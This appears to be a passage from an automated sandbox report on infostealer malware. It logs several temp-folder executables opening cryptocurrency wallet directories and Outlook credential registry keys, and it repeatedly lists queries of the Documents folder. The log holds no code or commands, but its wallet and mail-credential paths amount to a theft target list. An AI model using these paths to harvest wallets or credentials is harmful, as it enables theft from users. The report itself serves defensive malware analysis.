Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
